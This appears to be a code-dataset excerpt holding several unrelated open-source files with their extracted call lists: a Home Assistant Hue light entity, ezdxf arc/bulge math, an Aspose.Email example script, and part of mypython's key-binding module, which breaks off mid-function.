scale.""" return max(1, round((value / 255) * 254)) class HueLight(CoordinatorEntity, LightEntity): """Representation of a Hue light.""" def __init__(self, coordinator, bridge, is_group, light, supported_features, rooms): """Initialize the light.""" super().__init__(coordinator) self.light = light self.bridge = bridge self.is_group = is_group self._supported_features = supported_features self._rooms = rooms if is_group: self.is_osram = False self.is_philips = False self.is_innr = False self.is_ewelink = False self.is_livarno = False self.gamut_typ = GAMUT_TYPE_UNAVAILABLE self.gamut = None else: self.is_osram = light.manufacturername == "OSRAM" self.is_philips = light.manufacturername == "Philips" self.is_innr = light.manufacturername == "innr" self.is_ewelink = light.manufacturername == "eWeLink" self.is_livarno = light.manufacturername.startswith("_TZ3000_") self.gamut_typ = self.light.colorgamuttype self.gamut = self.light.colorgamut _LOGGER.debug("Color gamut of %s: %s", self.name, str(self.gamut)) if self.light.swupdatestate == "readytoinstall": err = ( "Please check for software updates of the %s " "bulb in the Philips Hue App." ) _LOGGER.warning(err, self.name) if self.gamut and not color.check_valid_gamut(self.gamut): err = "Color gamut of %s: %s, not valid, setting gamut to None." _LOGGER.debug(err, self.name, str(self.gamut)) self.gamut_typ = GAMUT_TYPE_UNAVAILABLE self.gamut = None @property def unique_id(self): """Return the unique ID of this Hue light.""" unique_id = self.light.uniqueid if not unique_id and self.is_group and self.light.room: unique_id = self.light.room["id"] return unique_id @property def device_id(self): """Return the ID of this Hue light.""" return self.unique_id @property def name(self): """Return the name of the Hue light.""" return self.light.name @property def brightness(self): """Return the brightness of this light between 0..255.""" if self.is_group: bri = self.light.action.get("bri") else: bri = self.light.state.get("bri") if bri is None: return bri return hue_brightness_to_hass(bri) @property def _color_mode(self): """Return the hue color mode.""" if self.is_group: return self.light.action.get("colormode") return self.light.state.get("colormode") @property def hs_color(self): """Return the hs color value.""" mode = self._color_mode source = self.light.action if self.is_group else self.light.state if mode in ("xy", "hs") and "xy" in source: return color.color_xy_to_hs(*source["xy"], self.gamut) return None @property def color_temp(self): """Return the CT color value.""" # Don't return color temperature unless in color temperature mode if self._color_mode != "ct": return None if self.is_group: return self.light.action.get("ct") return self.light.state.get("ct") @property def min_mireds(self): """Return the coldest color_temp that this light supports.""" if self.is_group: return super().min_mireds min_mireds = self.light.controlcapabilities.get("ct", {}).get("min") # We filter out '0' too, which can be incorrectly reported by 3rd party buls if not min_mireds: return super().min_mireds return min_mireds @property def max_mireds(self): """Return the warmest color_temp that this light supports.""" if self.is_group: return super().max_mireds if self.is_livarno: return 500 max_mireds = self.light.controlcapabilities.get("ct", {}).get("max") if not max_mireds: return super().max_mireds return max_mireds @property def is_on(self): """Return true if device is on.""" if self.is_group: return self.light.state["any_on"] return self.light.state["on"] @property def available(self): """Return if light is available.""" return self.coordinator.last_update_success and ( self.is_group or self.bridge.allow_unreachable or self.light.state["reachable"] ) @property def supported_features(self): """Flag supported features.""" return self._supported_features @property def effect(self): """Return the current effect.""" return self.light.state.get("effect", None) @property def effect_list(self): """Return the list of supported effects.""" if self.is_osram: return [EFFECT_RANDOM] return [EFFECT_COLORLOOP, EFFECT_RANDOM] @property def device_info(self) -> DeviceInfo | None: """Return the device info.""" if self.light.type in ( GROUP_TYPE_LIGHT_GROUP, GROUP_TYPE_ROOM, GROUP_TYPE_LUMINAIRE, GROUP_TYPE_LIGHT_SOURCE, ): return None suggested_area = None if self.light.id in self._rooms: suggested_area = self._rooms[self.light.id] return DeviceInfo( identifiers={(HUE_DOMAIN, self.device_id)}, manufacturer=self.light.manufacturername, # productname added in Hue Bridge API 1.24 # (published 03/05/2018) model=self.light.productname or self.light.modelid, name=self.name, # Not yet exposed as properties in aiohue suggested_area=suggested_area, sw_version=self.light.raw["swversion"], via_device=(HUE_DOMAIN, self.bridge.api.config.bridgeid), ) async def async_added_to_hass(self) -> None: """Handle entity being added to Home Assistant.""" self.async_on_remove( self.bridge.listen_updates( self.light.ITEM_TYPE, self.light.id, self.async_write_ha_state ) ) await super().async_added_to_hass() async def async_turn_on(self, **kwargs): """Turn the specified or all lights on.""" command = {"on": True} if ATTR_TRANSITION in kwargs: command["transitiontime"] = int(kwargs[ATTR_TRANSITION] * 10) if ATTR_HS_COLOR in kwargs: if self.is_osram: command["hue"] = int(kwargs[ATTR_HS_COLOR][0] / 360 * 65535) command["sat"] = int(kwargs[ATTR_HS_COLOR][1] / 100 * 255) else: # Philips hue bulb models respond differently to hue/sat # requests, so we convert to XY first to ensure a consistent # color. xy_color = color.color_hs_to_xy(*kwargs[ATTR_HS_COLOR], self.gamut) command["xy"] = xy_color elif ATTR_COLOR_TEMP in kwargs: temp = kwargs[ATTR_COLOR_TEMP] command["ct"] = max(self.min_mireds, min(temp, self.max_mireds)) if ATTR_BRIGHTNESS in kwargs: command["bri"] = hass_to_hue_brightness(kwargs[ATTR_BRIGHTNESS]) flash = kwargs.get(ATTR_FLASH) if flash == FLASH_LONG: command["alert"] = "lselect" del command["on"] elif flash == FLASH_SHORT: command["alert"] = "select" del command["on"] elif not self.is_innr and not self.is_ewelink and not self.is_livarno: command["alert"] = "none" if ATTR_EFFECT in kwargs: effect = kwargs[ATTR_EFFECT] if effect == EFFECT_COLORLOOP: command["effect"] = "colorloop" elif effect == EFFECT_RANDOM: command["hue"] = random.randrange(0, 65535) command["sat"] = random.randrange(150, 254) else: command["effect"] = "none" if self.is_group: await self.bridge.async_request_call( partial(self.light.set_action, **command) ) else: await self.bridge.async_request_call( partial(self.light.set_state, **command) ) await self.coordinator.async_request_refresh() async def async_turn_off(self, **kwargs): """Turn the specified or all lights off.""" command = {"on": False} if ATTR_TRANSITION in kwargs: command["transitiontime"] = int(kwargs[ATTR_TRANSITION] * 10) flash = kwargs.get(ATTR_FLASH) if flash == FLASH_LONG: command["alert"] = "lselect" del command["on"] elif flash == FLASH_SHORT: command["alert"] = "select" del command["on"] elif not self.is_innr and not self.is_livarno: command["alert"] = "none" if self.is_group: await self.bridge.async_request_call( partial(self.light.set_action, **command) ) else: await self.bridge.async_request_call( partial(self.light.set_state, **command) ) await self.coordinator.async_request_refresh() @property def extra_state_attributes(self): """Return the device state attributes.""" if not self.is_group: return {} return {ATTR_IS_HUE_GROUP: self.is_group}
[((1183, 1203), 'datetime.timedelta', 'timedelta', ([], {'seconds': '(5)'}), '(seconds=5)\n', (1192, 1203), False, 'from datetime import timedelta\n'), ((1215, 1242), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1232, 1242), False, 'import logging\n'), ((6930, 7002), 'functools.partial', 'partial', (['create_light', 'HueLight', 'light_coordinator', 'bridge', '(False)', 'rooms'], {}), '(create_light, HueLight, light_coordinator, bridge, False, rooms)\n', (6937, 7002), False, 'from functools import partial\n'), ((14302, 14615), 'homeassistant.helpers.entity.DeviceInfo', 'DeviceInfo', ([], {'identifiers': '{(HUE_DOMAIN, self.device_id)}', 'manufacturer': 'self.light.manufacturername', 'model': '(self.light.productname or self.light.modelid)', 'name': 'self.name', 'suggested_area': 'suggested_area', 'sw_version': "self.light.raw['swversion']", 'via_device': '(HUE_DOMAIN, self.bridge.api.config.bridgeid)'}), "(identifiers={(HUE_DOMAIN, self.device_id)}, manufacturer=self.\n light.manufacturername, model=self.light.productname or self.light.\n modelid, name=self.name, suggested_area=suggested_area, sw_version=self\n .light.raw['swversion'], via_device=(HUE_DOMAIN, self.bridge.api.config\n .bridgeid))\n", (14312, 14615), False, 'from homeassistant.helpers.entity import DeviceInfo\n'), ((3717, 3776), 'functools.partial', 'partial', (['async_safe_fetch', 'bridge', 'bridge.api.lights.update'], {}), '(async_safe_fetch, bridge, bridge.api.lights.update)\n', (3724, 3776), False, 'from functools import partial\n'), ((3851, 3930), 'homeassistant.helpers.debounce.Debouncer', 'Debouncer', (['bridge.hass', '_LOGGER'], {'cooldown': 'REQUEST_REFRESH_DELAY', 'immediate': '(True)'}), '(bridge.hass, _LOGGER, cooldown=REQUEST_REFRESH_DELAY, immediate=True)\n', (3860, 3930), False, 'from homeassistant.helpers.debounce import Debouncer\n'), ((4414, 4486), 'functools.partial', 'partial', (['create_light', 'HueLight', 'light_coordinator', 'bridge', '(False)', 'rooms'], {}), '(create_light, HueLight, light_coordinator, bridge, False, rooms)\n', (4421, 4486), False, 'from functools import partial\n'), ((4866, 4925), 'functools.partial', 'partial', (['async_safe_fetch', 'bridge', 'bridge.api.groups.update'], {}), '(async_safe_fetch, bridge, bridge.api.groups.update)\n', (4873, 4925), False, 'from functools import partial\n'), ((5000, 5079), 'homeassistant.helpers.debounce.Debouncer', 'Debouncer', (['bridge.hass', '_LOGGER'], {'cooldown': 'REQUEST_REFRESH_DELAY', 'immediate': '(True)'}), '(bridge.hass, _LOGGER, cooldown=REQUEST_REFRESH_DELAY, immediate=True)\n', (5009, 5079), False, 'from homeassistant.helpers.debounce import Debouncer\n'), ((5307, 5377), 'functools.partial', 'partial', (['create_light', 'HueLight', 'group_coordinator', 'bridge', '(True)', 'None'], {}), '(create_light, HueLight, group_coordinator, bridge, True, None)\n', (5314, 5377), False, 'from functools import partial\n'), ((7376, 7400), 'async_timeout.timeout', 'async_timeout.timeout', (['(4)'], {}), '(4)\n', (7397, 7400), False, 'import async_timeout\n'), ((7569, 7597), 'homeassistant.helpers.update_coordinator.UpdateFailed', 'UpdateFailed', (['"""Unauthorized"""'], {}), "('Unauthorized')\n", (7581, 7597), False, 'from homeassistant.helpers.update_coordinator import CoordinatorEntity, DataUpdateCoordinator, UpdateFailed\n'), ((7663, 7696), 'homeassistant.helpers.update_coordinator.UpdateFailed', 'UpdateFailed', (['f"""Hue error: {err}"""'], {}), "(f'Hue error: {err}')\n", (7675, 7696), False, 'from homeassistant.helpers.update_coordinator import CoordinatorEntity, DataUpdateCoordinator, UpdateFailed\n'), ((11705, 11752), 'homeassistant.util.color.color_xy_to_hs', 'color.color_xy_to_hs', (["*source['xy']", 'self.gamut'], {}), "(*source['xy'], self.gamut)\n", (11725, 11752), False, 'from homeassistant.util import color\n'), ((15843, 15899), 'homeassistant.util.color.color_hs_to_xy', 'color.color_hs_to_xy', (['*kwargs[ATTR_HS_COLOR]', 'self.gamut'], {}), '(*kwargs[ATTR_HS_COLOR], self.gamut)\n', (15863, 15899), False, 'from homeassistant.util import color\n'), ((10131, 10166), 'homeassistant.util.color.check_valid_gamut', 'color.check_valid_gamut', (['self.gamut'], {}), '(self.gamut)\n', (10154, 10166), False, 'from homeassistant.util import color\n'), ((16825, 16851), 'random.randrange', 'random.randrange', (['(0)', '(65535)'], {}), '(0, 65535)\n', (16841, 16851), False, 'import random\n'), ((16885, 16911), 'random.randrange', 'random.randrange', (['(150)', '(254)'], {}), '(150, 254)\n', (16901, 16911), False, 'import random\n'), ((17066, 17107), 'functools.partial', 'partial', (['self.light.set_action'], {}), '(self.light.set_action, **command)\n', (17073, 17107), False, 'from functools import partial\n'), ((17202, 17242), 'functools.partial', 'partial', (['self.light.set_state'], {}), '(self.light.set_state, **command)\n', (17209, 17242), False, 'from functools import partial\n'), ((17992, 18033), 'functools.partial', 'partial', (['self.light.set_action'], {}), '(self.light.set_action, **command)\n', (17999, 18033), False, 'from functools import partial\n'), ((18128, 18168), 'functools.partial', 'partial', (['self.light.set_state'], {}), '(self.light.set_state, **command)\n', (18135, 18168), False, 'from functools import partial\n')]
dmtvanzanten/ezdxf
src/ezdxf/math/bulge.py
6fe9d0aa961e011c87768aa6511256de21a662dd
# Copyright (c) 2018-2021 Manfred Moitzi # License: MIT License # source: http://www.lee-mac.com/bulgeconversion.html # source: http://www.afralisp.net/archive/lisp/Bulges1.htm from typing import Any, TYPE_CHECKING, Tuple import math from ezdxf.math import Vec2 if TYPE_CHECKING: from ezdxf.eztypes import Vertex __all__ = [ "bulge_to_arc", "bulge_3_points", "bulge_center", "bulge_radius", "arc_to_bulge" ] def polar(p: Any, angle: float, distance: float) -> Vec2: """ Returns the point at a specified `angle` and `distance` from point `p`. Args: p: point as :class:`Vec2` compatible object angle: angle in radians distance: distance """ return Vec2(p) + Vec2.from_angle(angle, distance) def angle(p1: Any, p2: Any) -> float: """ Returns angle a line defined by two endpoints and x-axis in radians. Args: p1: start point as :class:`Vec2` compatible object p2: end point as :class:`Vec2` compatible object """ return (Vec2(p2) - Vec2(p1)).angle def arc_to_bulge(center: 'Vertex', start_angle: float, end_angle: float, radius: float) -> Tuple['Vec2', 'Vec2', float]: """ Returns bulge parameters from arc parameters. Args: center: circle center point as :class:`Vec2` compatible object start_angle: start angle in radians end_angle: end angle in radians radius: circle radius Returns: tuple: (start_point, end_point, bulge) """ start_point = polar(center, start_angle, radius) end_point = polar(center, end_angle, radius) pi2 = math.pi * 2 a = math.fmod((pi2 + (end_angle - start_angle)), pi2) / 4. bulge = math.sin(a) / math.cos(a) return start_point, end_point, bulge def bulge_3_points(start_point: 'Vertex', end_point: 'Vertex', point: 'Vertex') -> float: """ Returns bulge value defined by three points. Based on 3-Points to Bulge by `Lee Mac`_. Args: start_point: start point as :class:`Vec2` compatible object end_point: end point as :class:`Vec2` compatible object point: arbitrary point as :class:`Vec2` compatible object """ a = (math.pi - angle(point, start_point) + angle(point, end_point)) / 2 return math.sin(a) / math.cos(a) def bulge_to_arc(start_point: 'Vertex', end_point: 'Vertex', bulge: float) -> Tuple['Vec2', float, float, float]: """ Returns arc parameters from bulge parameters. The arcs defined by bulge values of :class:`~ezdxf.entities.LWPolyline` and 2D :class:`~ezdxf.entities.Polyline` entities start at the vertex which includes the bulge value and ends at the following vertex. Based on Bulge to Arc by `Lee Mac`_. Args: start_point: start vertex as :class:`Vec2` compatible object end_point: end vertex as :class:`Vec2` compatible object bulge: bulge value Returns: Tuple: (center, start_angle, end_angle, radius) """ r = signed_bulge_radius(start_point, end_point, bulge) a = angle(start_point, end_point) + (math.pi / 2 - math.atan(bulge) * 2) c = polar(start_point, a, r) if bulge < 0: return c, angle(c, end_point), angle(c, start_point), abs(r) else: return c, angle(c, start_point), angle(c, end_point), abs(r) def bulge_center(start_point: 'Vertex', end_point: 'Vertex', bulge: float) -> 'Vec2': """ Returns center of arc described by the given bulge parameters. Based on Bulge Center by `Lee Mac`_. Args: start_point: start point as :class:`Vec2` compatible object end_point: end point as :class:`Vec2` compatible object bulge: bulge value as float """ start_point = Vec2(start_point) a = angle(start_point, end_point) + (math.pi / 2. - math.atan(bulge) * 2.) return start_point + Vec2.from_angle(a, signed_bulge_radius(start_point, end_point, bulge)) def signed_bulge_radius(start_point: 'Vertex', end_point: 'Vertex', bulge: float) -> float: return Vec2(start_point).distance(Vec2(end_point)) * ( 1. + (bulge * bulge)) / 4. / bulge def bulge_radius(start_point: 'Vertex', end_point: 'Vertex', bulge: float) -> float: """ Returns radius of arc defined by the given bulge parameters. Based on Bulge Radius by `Lee Mac`_ Args: start_point: start point as :class:`Vec2` compatible object end_point: end point as :class:`Vec2` compatible object bulge: bulge value """ return abs(signed_bulge_radius(start_point, end_point, bulge))
[((3789, 3806), 'ezdxf.math.Vec2', 'Vec2', (['start_point'], {}), '(start_point)\n', (3793, 3806), False, 'from ezdxf.math import Vec2\n'), ((704, 711), 'ezdxf.math.Vec2', 'Vec2', (['p'], {}), '(p)\n', (708, 711), False, 'from ezdxf.math import Vec2\n'), ((714, 746), 'ezdxf.math.Vec2.from_angle', 'Vec2.from_angle', (['angle', 'distance'], {}), '(angle, distance)\n', (729, 746), False, 'from ezdxf.math import Vec2\n'), ((1635, 1682), 'math.fmod', 'math.fmod', (['(pi2 + (end_angle - start_angle))', 'pi2'], {}), '(pi2 + (end_angle - start_angle), pi2)\n', (1644, 1682), False, 'import math\n'), ((1702, 1713), 'math.sin', 'math.sin', (['a'], {}), '(a)\n', (1710, 1713), False, 'import math\n'), ((1716, 1727), 'math.cos', 'math.cos', (['a'], {}), '(a)\n', (1724, 1727), False, 'import math\n'), ((2285, 2296), 'math.sin', 'math.sin', (['a'], {}), '(a)\n', (2293, 2296), False, 'import math\n'), ((2299, 2310), 'math.cos', 'math.cos', (['a'], {}), '(a)\n', (2307, 2310), False, 'import math\n'), ((1012, 1020), 'ezdxf.math.Vec2', 'Vec2', (['p2'], {}), '(p2)\n', (1016, 1020), False, 'from ezdxf.math import Vec2\n'), ((1023, 1031), 'ezdxf.math.Vec2', 'Vec2', (['p1'], {}), '(p1)\n', (1027, 1031), False, 'from ezdxf.math import Vec2\n'), ((3142, 3158), 'math.atan', 'math.atan', (['bulge'], {}), '(bulge)\n', (3151, 3158), False, 'import math\n'), ((3863, 3879), 'math.atan', 'math.atan', (['bulge'], {}), '(bulge)\n', (3872, 3879), False, 'import math\n'), ((4266, 4281), 'ezdxf.math.Vec2', 'Vec2', (['end_point'], {}), '(end_point)\n', (4270, 4281), False, 'from ezdxf.math import Vec2\n'), ((4239, 4256), 'ezdxf.math.Vec2', 'Vec2', (['start_point'], {}), '(start_point)\n', (4243, 4256), False, 'from ezdxf.math import Vec2\n')]
aspose-email/Aspose.Email-for-Java
Plugins/Aspose.Email Java for Python/tests/ProgrammingEmail/ManageAttachments/ManageAttachments.py
cf4567e54f7979e7296c99bcae2c6477385d7735
# To change this license header, choose License Headers in Project Properties. # To change this template file, choose Tools | Templates # and open the template in the editor. #if __name__ == "__main__": # print "Hello World" from ProgrammingEmail import ManageAttachments import jpype import os.path asposeapispath = os.path.join(os.path.abspath("./../../../"), "lib/") dataDir = os.path.join(os.path.abspath("./"), "data/") print "You need to put your Aspose.Email for Java APIs .jars in this folder:\n"+asposeapispath #print dataDir jpype.startJVM(jpype.getDefaultJVMPath(), "-Djava.ext.dirs=%s" % asposeapispath) hw = ManageAttachments(dataDir) hw.main()
[]
asmeurer/mypython
mypython/keys.py
ae984926739cc2bb3abe70566762d7b4052ed0ae
from prompt_toolkit.key_binding.bindings.named_commands import (accept_line, self_insert, backward_delete_char, beginning_of_line) from prompt_toolkit.key_binding.bindings.basic import if_no_repeat from prompt_toolkit.key_binding.bindings.basic import load_basic_bindings from prompt_toolkit.key_binding.bindings.emacs import load_emacs_bindings, load_emacs_search_bindings from prompt_toolkit.key_binding.bindings.mouse import load_mouse_bindings from prompt_toolkit.key_binding.bindings.cpr import load_cpr_bindings from prompt_toolkit.key_binding.bindings.page_navigation import load_emacs_page_navigation_bindings from prompt_toolkit.key_binding import KeyBindings, merge_key_bindings from prompt_toolkit.keys import Keys, ALL_KEYS from prompt_toolkit.filters import Condition, HasSelection, is_searching from prompt_toolkit.selection import SelectionState from prompt_toolkit.clipboard import ClipboardData from prompt_toolkit.input.vt100_parser import ANSI_SEQUENCES from prompt_toolkit.application.current import get_app from prompt_toolkit.application import run_in_terminal from prompt_toolkit import __version__ as prompt_toolkit_version from .multiline import (auto_newline, tab_should_insert_whitespace, document_is_multiline_python) from .tokenize import inside_string, matching_parens from .theme import emoji, emoji_pudb from .processors import get_pyflakes_warnings import re import subprocess import sys import textwrap import platform def get_key_bindings(): # Based on prompt_toolkit.key_binding.defaults.load_key_bindings() return merge_key_bindings([ load_basic_bindings(), load_emacs_bindings(), load_emacs_search_bindings(), load_emacs_page_navigation_bindings(), load_mouse_bindings(), load_cpr_bindings(), custom_key_bindings, ]) r = custom_key_bindings = KeyBindings() def warning_positions(event): document = event.current_buffer.document warnings = get_pyflakes_warnings(document.text, frozenset(event.current_buffer.session._locals)) positions = [] for (row, col, msg, m) in warnings: # Handle SyntaxErrorMessage which is the same warning for the whole # line. if m.col != col: continue pos = document.translate_row_col_to_index(row, col) positions.append(pos) return positions @r.add_binding(Keys.Escape, 'p') def previous_warning(event): positions = warning_positions(event) buffer = event.current_buffer buffer._show_syntax_warning = True if not positions or positions[0] >= buffer.cursor_position: return p = positions[0] for pos in positions: if pos >= buffer.cursor_position: break p = pos event.current_buffer._show_syntax_warning = True event.current_buffer.cursor_position = p @r.add_binding(Keys.Escape, 'n') def next_warning(event): positions = warning_positions(event) buffer = event.current_buffer buffer._show_syntax_warning = True if not positions or positions[-1] <= buffer.cursor_position: return p = positions[-1] for pos in reversed(positions): if pos <= buffer.cursor_position: break p = pos event.current_buffer.cursor_position = p # This can be removed once # https://github.com/prompt-toolkit/python-prompt-toolkit/pull/857 is in a # released version of prompt-toolkit. ANSI_SEQUENCES['\x1b[1;9A'] = (Keys.Escape, Keys.Up) ANSI_SEQUENCES['\x1b[1;9B'] = (Keys.Escape, Keys.Down) @r.add_binding(Keys.Escape, Keys.Up) def previous_history_search(event): event.key_sequence[-1].accept_next = True buffer = event.current_buffer buffer.history_backward(count=event.arg, history_search=True) @r.add_binding(Keys.Escape, 'P') @r.add_binding(Keys.Escape, Keys.Down) def forward_history_search(event): event.key_sequence[-1].accept_next = True buffer = event.current_buffer buffer.history_forward(count=event.arg, history_search=True) @r.add_binding(Keys.Escape, '<') def beginning(event): """ Move to the beginning """ event.current_buffer.cursor_position = 0 @r.add_binding(Keys.Escape, '>') def end(event): """ Move to the end """ event.current_buffer.cursor_position = len(event.current_buffer.text) # Document.start_of_paragraph/end_of_paragraph don't treat multiple blank # lines correctly. # Gives the positions right before one or more blank lines BLANK_LINES = re.compile(r'\S *(\n *\n)') @r.add_binding(Keys.Escape, '}') def forward_paragraph(event): """ Move forward one paragraph of text """ text = event.current_buffer.text cursor_position = event.current_buffer.cursor_position for m in BLANK_LINES.finditer(text): if m.start(0) > cursor_position: event.current_buffer.cursor_position = m.start(1)+1 return event.current_buffer.cursor_position = len(text) @r.add_binding(Keys.Escape, '{') def backward_paragraph(event): """ Move back one paragraph of text """ text = event.current_buffer.text cursor_position = event.current_buffer.cursor_position for m in BLANK_LINES.finditer(text[::-1]): if m.start(0) > len(text) - cursor_position: event.current_buffer.cursor_position = len(text) - m.end(1) + 1 return event.current_buffer.cursor_position = 0 WORD = re.compile(r'([a-z0-9]+|[A-Z]{2,}|[a-zA-Z0-9][a-z0-9]*)') @r.add_binding(Keys.Escape, 'f') @r.add_binding(Keys.Escape, Keys.Right) def forward_word(event): text = event.current_buffer.text cursor_position = event.current_buffer.cursor_position for m in WORD.finditer(text): if m.end(0) > cursor_position: event.current_buffer.cursor_position = m.end(0) return event.current_buffer.cursor_position = len(text) @r.add_binding(Keys.Escape, 'b') @r.add_binding(Keys.Escape, Keys.Left) def backward_word(event): """ Move back one paragraph of text """ text = event.current_buffer.text cursor_position = event.current_buffer.cursor_position for m in reversed(list(WORD.finditer(text))): if m.start(0) < cursor_position: event.current_buffer.cursor_position = m.start(0) return event.current_buffer.cursor_position = 0 @r.add_binding(Keys.Escape, 'd') def kill_word(event): buffer = event.current_buffer text = buffer.text cursor_position = buffer.cursor_position pos = None for m in WORD.finditer(text): if m.end(0) > cursor_position: pos = m.end(0) - cursor_position break if pos: deleted = buffer.delete(count=pos) event.app.clipboard.set_text(deleted) @r.add_binding(Keys.Escape, Keys.Backspace) def backward_kill_word(event): buffer = event.current_buffer text = buffer.text cursor_position = buffer.cursor_position for m in reversed(list(WORD.finditer(text))): if m.start(0) < cursor_position: pos = cursor_position - m.start(0) break else: pos = buffer.cursor_position if pos: deleted = buffer.delete_before_cursor(count=pos) event.app.clipboard.set_text(deleted) def insert_text_ovewrite(buffer, data, move_cursor=True): """ Insert characters at cursor position. :param fire_event: Fire `on_text_insert` event. This is mainly used to trigger autocompletion while typing. """ # Original text & cursor position. otext = buffer.text ocpos = buffer.cursor_position # Don't overwrite the newline itself. Just before the line ending, # it should act like insert mode. overwritten_text = otext[ocpos:ocpos + len(data)] buffer.text = otext[:ocpos] + data + otext[ocpos + len(overwritten_text):] if move_cursor: buffer.cursor_position += len(data) @r.add_binding(Keys.Escape, 'l') def downcase_word(event): buffer = event.current_buffer text = buffer.text cursor_position = event.current_buffer.cursor_position for m in WORD.finditer(text): pos = m.end(0) if pos > cursor_position: word = buffer.document.text[cursor_position:pos] insert_text_ovewrite(buffer, word.lower()) return event.current_buffer.cursor_position = len(text) @r.add_binding(Keys.Escape, 'u') def upcase_word(event): buffer = event.current_buffer text = buffer.text cursor_position = event.current_buffer.cursor_position for m in WORD.finditer(text): pos = m.end(0) if pos > cursor_position: word = buffer.document.text[cursor_position:pos] insert_text_ovewrite(buffer, word.upper()) return event.current_buffer.cursor_position = len(text) @r.add_binding(Keys.Escape, 'c') def capitalize_word(event): buffer = event.current_buffer text = buffer.text cursor_position = event.current_buffer.cursor_position for m in WORD.finditer(text): pos = m.end(0) if pos > cursor_position: word = buffer.document.text[cursor_position:pos] # Don't use word.capitalize() because the first character could be # - or _ for i, c in enumerate(word): if c.isalnum(): word = word[:i] + c.capitalize() + word[i+1:].lower() break insert_text_ovewrite(buffer, word) return event.current_buffer.cursor_position = len(text) @r.add_binding(Keys.Escape, Keys.ControlF) def forward_sexp(event): buffer = event.current_buffer document = buffer.document text = buffer.text row, col = document.translate_index_to_position(buffer.cursor_position) row += 1 matching, mismatching = matching_parens(text) for opening, closing in matching: if opening.start == (row, col): new_pos = document.translate_row_col_to_index(closing.end[0]-1, closing.end[1]) buffer.cursor_position = new_pos return event.app.output.bell() @r.add_binding(Keys.Escape, Keys.ControlB) def backward_sexp(event): buffer = event.current_buffer document = buffer.document text = buffer.text row, col = document.translate_index_to_position(buffer.cursor_position) row += 1 matching, mismatching = matching_parens(text) for opening, closing in matching: if closing.end == (row, col): new_pos = document.translate_row_col_to_index(opening.start[0]-1, opening.start[1]) buffer.cursor_position = new_pos return event.app.output.bell() @r.add_binding(Keys.Left) def left_multiline(event): """ Left that wraps around in multiline. """ if event.current_buffer.cursor_position - event.arg >= 0: event.current_buffer.cursor_position -= event.arg if getattr(event.current_buffer.selection_state, "shift_arrow", False): event.current_buffer.selection_state = None @r.add_binding(Keys.Right) def right_multiline(event): """ Right that wraps around in multiline. """ if event.current_buffer.cursor_position + event.arg <= len(event.current_buffer.text): event.current_buffer.cursor_position += event.arg if getattr(event.current_buffer.selection_state, "shift_arrow", False): event.current_buffer.selection_state = None @r.add_binding(Keys.ControlD) def exit(event): event.app.exit(exception=EOFError, style='class:exiting') @r.add_binding(Keys.ControlC, filter=~is_searching) def keyboard_interrupt(event): event.app.exit(exception=KeyboardInterrupt, style='class:aborting') is_returnable = Condition( lambda: get_app().current_buffer.is_returnable) @r.add_binding(Keys.Enter, filter=is_returnable) def multiline_enter(event): """ When not in multiline, execute. When in multiline, try to intelligently add a newline or execute. """ buffer = event.current_buffer document = buffer.document multiline = document_is_multiline_python(document) text_after_cursor = document.text_after_cursor text_before_cursor = document.text_before_cursor text = buffer.text # isspace doesn't respect vacuous truth if (not text_after_cursor or text_after_cursor.isspace()) and text_before_cursor.replace(' ', '').endswith('\n'): # If we are at the end of the buffer, accept unless we are in a # docstring row, col = document.translate_index_to_position(buffer.cursor_position) row += 1 if multiline and inside_string(text, row, col): # We are inside a docstring auto_newline(event.current_buffer) else: accept_line(event) elif not multiline: # Always accept a single valid line. Also occurs for unclosed single # quoted strings (which will give a syntax error) accept_line(event) else: auto_newline(event.current_buffer) # Always accept the line if the previous key was Up # Requires https://github.com/jonathanslenders/python-prompt-toolkit/pull/492. # We don't need a parallel for down because down is already at the end of the # prompt. @r.add_binding(Keys.Enter, filter=is_returnable) def accept_after_history_backward(event): pks = event.previous_key_sequence if pks and getattr(pks[-1], 'accept_next', False) and ((len(pks) == 1 and pks[0].key == "up") or (len(pks) == 2 and pks[0].key == "escape" and isinstance(pks[1].key, str) and pks[1].key in ['p', 'P', 'up', 'down'])): accept_line(event) else: multiline_enter(event) @r.add_binding(Keys.Escape, Keys.Enter) @r.add_binding(Keys.Escape, Keys.ControlJ) def insert_newline(event): auto_newline(event.current_buffer) @r.add_binding(Keys.ControlO) def open_line(event): event.current_buffer.newline(copy_margin=False) event.current_buffer.cursor_left() # M-[ a g is set to S-Enter in iTerm2 settings Keys.ShiftEnter = "<Shift-Enter>" ALL_KEYS.append('<Shift-Enter>') ANSI_SEQUENCES['\x1b[ag'] = Keys.ShiftEnter ANSI_SEQUENCES['\x1bOM'] = Keys.ShiftEnter if prompt_toolkit_version[0] != '3': r.add_binding(Keys.ShiftEnter)(accept_line) @r.add_binding(Keys.Tab, filter=tab_should_insert_whitespace) def indent(event): """ When tab should insert whitespace, do that instead of completion. """ # Text before cursor on the line must be whitespace because of the # TabShouldInsertWhitespaceFilter. before_cursor = event.app.current_buffer.document.current_line_before_cursor event.app.current_buffer.insert_text(' '*(4 - len(before_cursor)%4)) LEADING_WHITESPACE = re.compile(r'( *)[^ ]?') @r.add_binding(Keys.Escape, 'm') def back_to_indentation(event): """ Move back to the beginning of the line, ignoring whitespace. """ current_line = event.app.current_buffer.document.current_line before_cursor = event.app.current_buffer.document.current_line_before_cursor indent = LEADING_WHITESPACE.search(current_line) if indent: event.app.current_buffer.cursor_position -= len(before_cursor) - indent.end(1) @r.add_binding(Keys.Backspace, save_before=if_no_repeat) def delete_char_or_unindent(event): buffer = event.app.current_buffer if buffer.document.current_line_before_cursor.isspace(): spaces = len(buffer.document.current_line_before_cursor) # Delete up to the tab stop buffer.delete_before_cursor(count=4 + spaces%-4) else: backward_delete_char(event) # Reset the history search text buffer.history_search_text = None @r.add_binding(Keys.Escape, ' ') def cycle_spacing(event): """ Based on emacs's cycle-spacing On first call, remove all whitespace (if any) from around the cursor and replace it with a single space. On second call, remove all whitespace. On third call, restore the original whitespace and cursor position. """ buffer = event.app.current_buffer # Avoid issues when text grows or shrinks below, keeping the cursor # position out of sync cursor_position = buffer.cursor_position buffer.cursor_position = 0 buffer.text, buffer.cursor_position = do_cycle_spacing(buffer.text, cursor_position) def do_cycle_spacing(text, cursor_position, state=[]): rstripped = text[:cursor_position].rstrip() lstripped = text[cursor_position:].lstrip() text_before_cursor = text[:cursor_position] # The first element of state is the original text. The last element is the # buffer text and cursor position as we last left them. If either of those # have changed, reset. The state here is global, but that's fine, because # we consider any change to be enough clear the state. The worst that # happens here is that we resume when we shouldn't if things look exactly # as they did where we left off. # 